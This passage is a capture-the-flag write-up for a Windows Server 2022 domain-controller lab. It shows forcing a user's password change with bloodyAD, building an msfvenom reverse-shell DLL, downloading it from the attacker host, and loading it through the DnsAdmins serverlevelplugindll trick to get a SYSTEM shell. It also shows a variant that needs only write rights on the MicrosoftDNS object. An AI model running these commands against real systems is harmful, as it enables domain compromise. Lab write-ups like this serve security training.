WINRM 192.168.60.128 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM 192.168.60.128 5985 DC [-] bicker.com\lihua:hello%2633
❯ netexec smb $ip -u lihua -p 'hello%2633'
SMB 192.168.60.128 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB 192.168.60.128 445 DC [+] bicker.com\lihua:hello%2633

Force-change jianyin's password

❯ pip install bloodyAD
❯ bloodyAD -u lihua -p hello%2633 --host $ip -d bicker.com set password "jianyin" "P@ssw0rd123"
[+] Password changed successfully!
❯ netexec winrm $ip -u jianyin -p 'P@ssw0rd123'
WINRM 192.168.60.128 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM 192.168.60.128 5985 DC [+] bicker.com\jianyin:P@ssw0rd123 (Pwn3d!)

Restarting the DNS service

Generate a malicious DLL that spawns a reverse shell

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.60.100 LPORT=4444 -f dll -o rev.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

Connect as tindalos with evil-winrm and upload the file to the target

*Evil-WinRM* PS C:\Users\tindalos\Documents> wget http://192.168.60.100/rev.dll -outFile C:\Users\tindalos\Documents\rev.dll

image

Set the DNS plugin DLL path as described in the official docs

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd /config /serverlevelplugindll C:\Users\tindalos\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。

Switch back to jianyin, check the DNS service status and restart the service

*Evil-WinRM* PS C:\Users\jianyin\Documents> gsv dns

Status Name DisplayName
------ ---- -----------
Running dns DNS Server


*Evil-WinRM* PS C:\Users\jianyin\Documents> spsv dns
*Evil-WinRM* PS C:\Users\jianyin\Documents> start-service dns

Listen on the port

❯ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from bicker.com [192.168.60.128] 57084
Microsoft Windows [版本 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
root{7c1e4b8a2d6f3b9c5e0a}

There is actually a faster route that skips the DPAPI recovery of lihua's credentials and the jianyin password change entirely

Once tindalos has set the DNS plugin DLL, simply rebooting the target triggers the malicious DLL and delivers the reverse shell 😂

DnsAdmins hot reload

qiaojojo found an unintended solution 😂

Reference: DnsAdmins Revisited - Semperis

DNS hot-reload persistence based on the DnsAdmins group, and its variants

Even if the current user lacks the right to restart the DNS service, dnscmd.exe can be used to restart it

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd /config /serverlevelplugindll C:\Users\tindalos\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd 127.0.0.1 /restart

127.0.0.1 已成功完成。
命令成功完成。

It reports success, but the reverse shell does not arrive immediately

You need to wait a while before the shell comes in

❯ nc -lvp 4444
listening on [any] 4444 ...
192.168.60.128: inverse host lookup failed: Unknown host
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.128] 51624
Microsoft Windows [版本 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

The article also describes that a user need not be in the DnsAdmins group at all: any user with write access to the MicrosoftDNS object (or its direct child objects) gains the same powerful capability as DnsAdmins members, one that can lead to domain-admin-level privilege escalation

Revert to the snapshot and create a test user that is not in DnsAdmins

evil-winrm-py PS C:\Users\Administrator\Documents> New-ADUser -Name "dns-test" -SamAccountName "dns-test" -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force) -Enabled $true
evil-winrm-py PS C:\Users\Administrator\Documents> Add-ADGroupMember -Identity "Remote Management Users" -Members "dns-test"
evil-winrm-py PS C:\Users\Administrator\Documents> dsacls "CN=MicrosoftDNS,CN=System,DC=bicker,DC=com" /G "BICKER\dns-test:GRGW"
---------------------------------
❯ evil-winrm -i $ip -u dns-test -p 'P@ssw0rd!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dns-test\Documents> whoami /groups

组信息
-----------------

组名 类型 SID 属性
=========================================== ====== ============ ==============================
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users 别名 S-1-5-32-580 必需的组, 启用于默认, 启用的组
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
BUILTIN\Pre-Windows 2000 Compatible Access 别名 S-1-5-32-554 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK 已知组 S-1-5-2 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Plus Mandatory Level 标签 S-1-16-8448
  • The BICKER\dns-test user was granted specific rights on the DNS server root object CN=MicrosoftDNS,CN=System,DC=bicker,DC=com in Active Directory.
  • Meaning of /G "BICKER\dns-test:GRGW":
    • /G: grant rights.
    • BICKER\dns-test: the principal receiving the rights.
    • GRGW: the dsacls shorthand combining Generic Read and Generic Write.

The user is not in DnsAdmins, but it does hold generic read and generic write on the MicrosoftDNS object

访问列表:
允许 BICKER\dns-test 特殊访问
READ PERMISSIONS # generic read
LIST CONTENTS # list contents
WRITE SELF # write self
WRITE PROPERTY # write property
READ PROPERTY # read property
LIST OBJECT # list object

This too is enough to carry out the DnsAdmins hot-reload attack

*Evil-WinRM* PS C:\Users\dns-test\Documents> wget http://192.168.60.100/rev.dll -outFile C:\Users\dns-test\Documents\rev.dll
*Evil-WinRM* PS C:\Users\dns-test\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\dns-test\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。
*Evil-WinRM* PS C:\Users\dns-test\Documents> dnscmd /restart

. 已成功完成。
命令成功完成。
---------------------------
❯ rlwrap nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.128] 50597
Microsoft Windows [版本 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>
